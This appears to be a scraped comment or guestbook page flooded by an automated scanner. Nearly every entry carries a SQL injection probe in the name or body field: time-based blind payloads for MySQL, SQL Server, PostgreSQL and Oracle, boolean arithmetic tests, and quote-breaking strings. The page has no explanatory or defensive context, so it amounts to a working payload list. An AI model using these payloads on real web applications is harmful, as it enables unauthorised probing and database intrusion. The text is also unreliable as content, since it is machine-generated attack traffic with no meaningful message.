pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 27, 2025, 12:15 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUmeTiCnek4y'; waitfor delay '0:0:15' -- Sept. 27, 2025, 12:15 p.m.
555
pHqghUme Sept. 27, 2025, 12:15 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUmeKwcjrjL7' OR 820=(SELECT 820 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUmegcQ3LnR3') OR 740=(SELECT 740 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUmeqZPnU0oa')) OR 745=(SELECT 745 FROM PG_SLEEP(15))-- Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
1KYeMFdWk'; waitfor delay '0:0:15' --
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
555
pHqghUme'" Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
1-1 OR 803=(SELECT 803 FROM PG_SLEEP(15))--
pHqghUme����%2527%2522\'\" Sept. 27, 2025, 12:16 p.m.
555
@@9XH2t Sept. 27, 2025, 12:16 p.m.
555
pHqghUme Sept. 27, 2025, 12:16 p.m.
1-1) OR 23=(SELECT 23 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:16 p.m.
1-1)) OR 943=(SELECT 943 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:16 p.m.
118Pyd6Jn' OR 91=(SELECT 91 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:16 p.m.
1iEM5DwuL') OR 705=(SELECT 705 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:16 p.m.
1UsEI2btU')) OR 255=(SELECT 255 FROM PG_SLEEP(15))--
pHqghUme Sept. 27, 2025, 12:16 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 27, 2025, 12:16 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 27, 2025, 12:16 p.m.
1
pHqghUme Sept. 27, 2025, 12:16 p.m.
1'"
pHqghUme Sept. 27, 2025, 12:16 p.m.
1����%2527%2522\'\"
pHqghUme Sept. 27, 2025, 12:16 p.m.
@@Vizi6
pHqghUme Sept. 30, 2025, 1:51 p.m.
1
pHqghUme Sept. 30, 2025, 1:51 p.m.
1
pHqghUme Sept. 30, 2025, 1:53 p.m.
1
pHqghUme Sept. 30, 2025, 1:53 p.m.
1
pHqghUme Sept. 30, 2025, 1:53 p.m.
1
pHqghUme Sept. 30, 2025, 1:53 p.m.
555
pHqghUme Sept. 30, 2025, 1:53 p.m.
555
pHqghUme Sept. 30, 2025, 1:54 p.m.
555
pHqghUme Sept. 30, 2025, 1:54 p.m.
555KS8lYiZf
pHqghUme Sept. 30, 2025, 1:54 p.m.
555
pHqghUme Sept. 30, 2025, 1:54 p.m.
-1 OR 2+893-893-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:54 p.m.
-1 OR 2+373-373-1=0+0+0+1
pHqghUme Sept. 30, 2025, 1:54 p.m.
-1' OR 2+859-859-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:54 p.m.
-1' OR 2+738-738-1=0+0+0+1 or 'HEKJ8Hw8'='
pHqghUme Sept. 30, 2025, 1:54 p.m.
-1" OR 2+66-66-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:54 p.m.
555*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 30, 2025, 1:54 p.m.
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555-1; waitfor delay '0:0:15' --
pHqghUmenLmMwJ5F Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555-1); waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 1:54 p.m.
1
-1 OR 2+402-402-1=0+0+0+1 -- Sept. 30, 2025, 1:54 p.m.
1
-1 OR 2+574-574-1=0+0+0+1 Sept. 30, 2025, 1:54 p.m.
1
-1' OR 2+343-343-1=0+0+0+1 -- Sept. 30, 2025, 1:54 p.m.
1
-1' OR 2+677-677-1=0+0+0+1 or 'Q5Nbiv53'=' Sept. 30, 2025, 1:54 p.m.
1
-1" OR 2+170-170-1=0+0+0+1 -- Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555-1 waitfor delay '0:0:15' --
if(now()=sysdate(),sleep(15),0) Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555QoxBAZmt'; waitfor delay '0:0:15' --
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555-1 OR 968=(SELECT 968 FROM PG_SLEEP(15))--
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 30, 2025, 1:54 p.m.
1
pHqghUme Sept. 30, 2025, 1:54 p.m.
555-1) OR 154=(SELECT 154 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:55 p.m.
555-1)) OR 602=(SELECT 602 FROM PG_SLEEP(15))--
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555E6vexJT9' OR 387=(SELECT 387 FROM PG_SLEEP(15))--
pHqghUmemL7YxppX'; waitfor delay '0:0:15' -- Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555MEqGk6V6') OR 742=(SELECT 742 FROM PG_SLEEP(15))--
pHqghUme2sX8GAo3' OR 781=(SELECT 781 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
55599hJQv4M')) OR 280=(SELECT 280 FROM PG_SLEEP(15))--
pHqghUmeESW3weMR') OR 382=(SELECT 382 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme6tkF6x2o')) OR 833=(SELECT 833 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 30, 2025, 1:55 p.m.
555
pHqghUme Sept. 30, 2025, 1:55 p.m.
555'"
pHqghUme Sept. 30, 2025, 1:55 p.m.
555����%2527%2522\'\"
pHqghUme Sept. 30, 2025, 1:55 p.m.
@@GPKk0
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
1
pHqghUme'" Sept. 30, 2025, 1:55 p.m.
1
pHqghUme����%2527%2522\'\" Sept. 30, 2025, 1:55 p.m.
1
@@Zv2sH Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555
pHqghUme Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555
pHqghUme Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:55 p.m.
555
pHqghUme Sept. 30, 2025, 1:55 p.m.
1
pHqghUme Sept. 30, 2025, 1:56 p.m.
1
pHqghUme Sept. 30, 2025, 1:56 p.m.
555
pHqghUme Sept. 30, 2025, 1:56 p.m.
1
pHqghUme Sept. 30, 2025, 1:56 p.m.
555
pHqghUme Sept. 30, 2025, 1:56 p.m.
1
pHqghUme Sept. 30, 2025, 1:56 p.m.
555
pHqghUme Sept. 30, 2025, 1:56 p.m.
1Hn5I6rIE
pHqghUme Sept. 30, 2025, 1:56 p.m.
555
pHqghUme Sept. 30, 2025, 1:56 p.m.
1
pHqghUme Sept. 30, 2025, 1:56 p.m.
-1 OR 2+112-112-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:56 p.m.
-1 OR 2+43-43-1=0+0+0+1
pHqghUme Sept. 30, 2025, 1:56 p.m.
-1' OR 2+464-464-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:56 p.m.
-1' OR 2+413-413-1=0+0+0+1 or 'LQAw5TLW'='
pHqghUme Sept. 30, 2025, 1:56 p.m.
-1" OR 2+563-563-1=0+0+0+1 --
pHqghUme Sept. 30, 2025, 1:56 p.m.
555
pHqghUme Sept. 30, 2025, 1:56 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 30, 2025, 1:56 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 30, 2025, 1:56 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 30, 2025, 1:56 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 30, 2025, 1:56 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 1:56 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 1:57 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 1:57 p.m.
1YNAt0LAI'; waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 1:57 p.m.
1-1 OR 664=(SELECT 664 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:57 p.m.
1-1) OR 832=(SELECT 832 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
1-1)) OR 197=(SELECT 197 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
1wz5CbHcg' OR 655=(SELECT 655 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
16le0gLTs') OR 100=(SELECT 100 FROM PG_SLEEP(15))--
pHqghUmevsBbbPJI Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
1FexxgQpF')) OR 970=(SELECT 970 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 1:57 p.m.
555
-1 OR 2+925-925-1=0+0+0+1 -- Sept. 30, 2025, 1:57 p.m.
555
-1 OR 2+910-910-1=0+0+0+1 Sept. 30, 2025, 1:57 p.m.
555
-1' OR 2+199-199-1=0+0+0+1 -- Sept. 30, 2025, 1:57 p.m.
555
-1' OR 2+448-448-1=0+0+0+1 or '9cA3SXVZ'=' Sept. 30, 2025, 1:57 p.m.
555
-1" OR 2+993-993-1=0+0+0+1 -- Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
if(now()=sysdate(),sleep(15),0) Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 30, 2025, 1:57 p.m.
1
pHqghUme Sept. 30, 2025, 1:57 p.m.
1'"
pHqghUme Sept. 30, 2025, 1:57 p.m.
1����%2527%2522\'\"
pHqghUme Sept. 30, 2025, 1:57 p.m.
@@Yvy4d
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 30, 2025, 1:57 p.m.
555
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 30, 2025, 1:57 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 30, 2025, 1:57 p.m.
555
pHqghUmeYf2vVjWB'; waitfor delay '0:0:15' -- Sept. 30, 2025, 1:57 p.m.
555
pHqghUmeLLcJ90kd' OR 728=(SELECT 728 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:57 p.m.
555
pHqghUmehW25OwX7') OR 658=(SELECT 658 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:57 p.m.
555
pHqghUmeFHGIloW1')) OR 417=(SELECT 417 FROM PG_SLEEP(15))-- Sept. 30, 2025, 1:57 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 1:57 p.m.
555
pHqghUme'" Sept. 30, 2025, 1:57 p.m.
555
pHqghUme����%2527%2522\'\" Sept. 30, 2025, 1:57 p.m.
555
@@TwfED Sept. 30, 2025, 1:57 p.m.
555
pHqghUme Sept. 30, 2025, 5:55 p.m.
LhpHQxM9
pHqghUme Sept. 30, 2025, 5:55 p.m.
*1
pHqghUme Sept. 30, 2025, 5:55 p.m.
*1
pHqghUme Sept. 30, 2025, 5:55 p.m.
*1
pHqghUme Sept. 30, 2025, 5:55 p.m.
*1
pHqghUme Sept. 30, 2025, 5:55 p.m.
-1 OR 2+900-900-1=0+0+0+1
pHqghUme Sept. 30, 2025, 5:55 p.m.
-1 OR 3+900-900-1=0+0+0+1
pHqghUme Sept. 30, 2025, 5:55 p.m.
*if(now()=sysdate(),sleep(15),0)
pHqghUme Sept. 30, 2025, 5:55 p.m.
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Sept. 30, 2025, 5:55 p.m.
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Sept. 30, 2025, 5:55 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Sept. 30, 2025, 5:55 p.m.
-1; waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 5:55 p.m.
-1); waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 5:55 p.m.
-1 waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 5:55 p.m.
wqScyFuU'; waitfor delay '0:0:15' --
pHqghUme Sept. 30, 2025, 5:56 p.m.
555
pHqghUme Sept. 30, 2025, 5:56 p.m.
-1 OR 401=(SELECT 401 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
-1) OR 281=(SELECT 281 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
-1)) OR 465=(SELECT 465 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
18m5tRnS' OR 720=(SELECT 720 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
L4lkhIQk') OR 650=(SELECT 650 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
A0GkJo2d')) OR 77=(SELECT 77 FROM PG_SLEEP(15))--
pHqghUme Sept. 30, 2025, 5:56 p.m.
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUme Sept. 30, 2025, 5:56 p.m.
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Sept. 30, 2025, 5:56 p.m.
'"
pHqghUme Sept. 30, 2025, 5:56 p.m.
����%2527%2522\'\"
pHqghUme Sept. 30, 2025, 5:56 p.m.
@@B4hCJ
pHqghUme Sept. 30, 2025, 5:57 p.m.
555
pHqghUme Sept. 30, 2025, 5:57 p.m.
555
pHqghUme Sept. 30, 2025, 5:57 p.m.
555
pHqghUme Sept. 30, 2025, 5:58 p.m.
555
pHqghUme Sept. 30, 2025, 5:58 p.m.
555
pHqghUme Sept. 30, 2025, 5:58 p.m.
555
pHqghUme Sept. 30, 2025, 5:58 p.m.
555
pHqghUme Sept. 30, 2025, 5:58 p.m.
555
pHqghUme Sept. 30, 2025, 5:59 p.m.
555
pHqghUme Sept. 30, 2025, 5:59 p.m.
555
pHqghUme Sept. 30, 2025, 5:59 p.m.
555
pHqghUmeAiLtqFKx Sept. 30, 2025, 5:59 p.m.
555
pHqghUme Sept. 30, 2025, 5:59 p.m.
555
-1 OR 2+63-63-1=0+0+0+1 -- Sept. 30, 2025, 5:59 p.m.
555
-1 OR 2+433-433-1=0+0+0+1 Sept. 30, 2025, 5:59 p.m.
555
-1' OR 2+578-578-1=0+0+0+1 -- Sept. 30, 2025, 5:59 p.m.
555
-1' OR 2+517-517-1=0+0+0+1 or 'Z5q3zXfg'=' Sept. 30, 2025, 5:59 p.m.
555
-1" OR 2+696-696-1=0+0+0+1 -- Sept. 30, 2025, 5:59 p.m.
555
if(now()=sysdate(),sleep(15),0) Sept. 30, 2025, 5:59 p.m.
555
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Sept. 30, 2025, 5:59 p.m.
555
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Sept. 30, 2025, 5:59 p.m.
555
pHqghUme-1 waitfor delay '0:0:15' -- Sept. 30, 2025, 5:59 p.m.
555
pHqghUmeJceOpTzU'; waitfor delay '0:0:15' -- Sept. 30, 2025, 5:59 p.m.
555
pHqghUmeJY4doBa6' OR 124=(SELECT 124 FROM PG_SLEEP(15))-- Sept. 30, 2025, 5:59 p.m.
555
pHqghUmeRsNKUKIj') OR 811=(SELECT 811 FROM PG_SLEEP(15))-- Sept. 30, 2025, 5:59 p.m.
555
pHqghUme2dblKQ4r')) OR 41=(SELECT 41 FROM PG_SLEEP(15))-- Sept. 30, 2025, 5:59 p.m.
555
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Sept. 30, 2025, 5:59 p.m.
555
pHqghUme Sept. 30, 2025, 5:59 p.m.
555
pHqghUme'" Sept. 30, 2025, 5:59 p.m.
555
pHqghUme����%2527%2522\'\" Sept. 30, 2025, 5:59 p.m.
555
@@6yjoy Sept. 30, 2025, 5:59 p.m.
555
pHqghUme Oct. 1, 2025, 7:57 p.m.
1
pHqghUme Oct. 1, 2025, 7:57 p.m.
1
pHqghUme Oct. 1, 2025, 7:59 p.m.
555
pHqghUme Oct. 1, 2025, 7:59 p.m.
1
pHqghUme Oct. 1, 2025, 7:59 p.m.
1
pHqghUme Oct. 1, 2025, 7:59 p.m.
1
pHqghUme Oct. 1, 2025, 7:59 p.m.
555
pHqghUme Oct. 1, 2025, 7:59 p.m.
555
pHqghUme Oct. 1, 2025, 7:59 p.m.
555XbVs1J08
pHqghUme Oct. 1, 2025, 7:59 p.m.
555
pHqghUme Oct. 1, 2025, 7:59 p.m.
-1 OR 2+695-695-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 7:59 p.m.
-1 OR 2+65-65-1=0+0+0+1
pHqghUme Oct. 1, 2025, 7:59 p.m.
-1' OR 2+575-575-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 7:59 p.m.
-1' OR 2+660-660-1=0+0+0+1 or 'hUtbrAG3'='
pHqghUme Oct. 1, 2025, 7:59 p.m.
-1" OR 2+456-456-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 7:59 p.m.
555*if(now()=sysdate(),sleep(15),0)
pHqghUme Oct. 1, 2025, 8:01 p.m.
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Oct. 1, 2025, 8:01 p.m.
1
pHqghUme Oct. 1, 2025, 8:01 p.m.
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Oct. 1, 2025, 8:02 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1; waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1); waitfor delay '0:0:15' --
pHqghUme4VznRtRg Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1 waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:02 p.m.
1
-1 OR 2+728-728-1=0+0+0+1 -- Oct. 1, 2025, 8:02 p.m.
1
-1 OR 2+450-450-1=0+0+0+1 Oct. 1, 2025, 8:02 p.m.
1
-1' OR 2+665-665-1=0+0+0+1 -- Oct. 1, 2025, 8:02 p.m.
1
-1' OR 2+549-549-1=0+0+0+1 or 'Cs0kamjD'=' Oct. 1, 2025, 8:02 p.m.
1
-1" OR 2+45-45-1=0+0+0+1 -- Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555QX5LF1XA'; waitfor delay '0:0:15' --
if(now()=sysdate(),sleep(15),0) Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1 OR 199=(SELECT 199 FROM PG_SLEEP(15))--
pHqghUme0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1) OR 418=(SELECT 418 FROM PG_SLEEP(15))--
pHqghUme0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555-1)) OR 79=(SELECT 79 FROM PG_SLEEP(15))--
pHqghUme Oct. 1, 2025, 8:02 p.m.
555cdcedmuY' OR 946=(SELECT 946 FROM PG_SLEEP(15))--
pHqghUme-1 waitfor delay '0:0:15' -- Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555Bqmqx9Zq') OR 408=(SELECT 408 FROM PG_SLEEP(15))--
pHqghUme96AAfgaP'; waitfor delay '0:0:15' -- Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:02 p.m.
555TUNquQr4')) OR 984=(SELECT 984 FROM PG_SLEEP(15))--
pHqghUmeI7CSmGxa' OR 653=(SELECT 653 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:02 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
pHqghUmeco2z5OvB') OR 89=(SELECT 89 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
pHqghUme Oct. 1, 2025, 8:03 p.m.
555
pHqghUme Oct. 1, 2025, 8:03 p.m.
555'"
pHqghUme Oct. 1, 2025, 8:03 p.m.
555����%2527%2522\'\"
pHqghUmeUtCqo6v9')) OR 407=(SELECT 407 FROM PG_SLEEP(15))-- Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
@@21WNZ
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
555
pHqghUme Oct. 1, 2025, 8:03 p.m.
1
pHqghUme'" Oct. 1, 2025, 8:03 p.m.
1
pHqghUme����%2527%2522\'\" Oct. 1, 2025, 8:03 p.m.
1
@@uhpWz Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
555
pHqghUme Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
555
pHqghUme Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:03 p.m.
1
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1DiOkCLAj
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1
pHqghUme Oct. 1, 2025, 8:04 p.m.
-1 OR 2+275-275-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 8:04 p.m.
-1 OR 2+386-386-1=0+0+0+1
pHqghUme Oct. 1, 2025, 8:04 p.m.
-1' OR 2+779-779-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 8:04 p.m.
-1' OR 2+744-744-1=0+0+0+1 or 'kgUDH5Vz'='
pHqghUme Oct. 1, 2025, 8:04 p.m.
-1" OR 2+60-60-1=0+0+0+1 --
pHqghUme Oct. 1, 2025, 8:04 p.m.
1*if(now()=sysdate(),sleep(15),0)
pHqghUme Oct. 1, 2025, 8:04 p.m.
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
pHqghUme Oct. 1, 2025, 8:04 p.m.
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
pHqghUme Oct. 1, 2025, 8:04 p.m.
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
pHqghUme Oct. 1, 2025, 8:04 p.m.
1-1; waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:04 p.m.
1-1); waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:04 p.m.
1-1 waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:04 p.m.
1Hs1ijukk'; waitfor delay '0:0:15' --
pHqghUme Oct. 1, 2025, 8:04 p.m.
1-1 OR 352=(SELECT 352 FROM PG_SLEEP(15))--
pHqghUme Oct. 1, 2025, 8:04 p.m.
555
pHqghUme Oct. 1, 2025, 8:04 p.m.
1-1) OR 470=(SELECT 470 FROM PG_SLEEP(15))--
pHqghUme Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1-1)) OR 57=(SELECT 57 FROM PG_SLEEP(15))--
pHqghUme Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1Mr28szYV' OR 607=(SELECT 607 FROM PG_SLEEP(15))--
pHqghUmeQSp8clWr Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1dNz8KCGE') OR 296=(SELECT 296 FROM PG_SLEEP(15))--
pHqghUme Oct. 1, 2025, 8:05 p.m.
555
-1 OR 2+198-198-1=0+0+0+1 -- Oct. 1, 2025, 8:05 p.m.
555
-1 OR 2+597-597-1=0+0+0+1 Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
14wkhjFvr')) OR 976=(SELECT 976 FROM PG_SLEEP(15))--
-1' OR 2+785-785-1=0+0+0+1 -- Oct. 1, 2025, 8:05 p.m.
555
-1' OR 2+173-173-1=0+0+0+1 or 'bnMTKcDU'=' Oct. 1, 2025, 8:05 p.m.
555
-1" OR 2+862-862-1=0+0+0+1 -- Oct. 1, 2025, 8:05 p.m.
555
pHqghUme Oct. 1, 2025, 8:05 p.m.
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
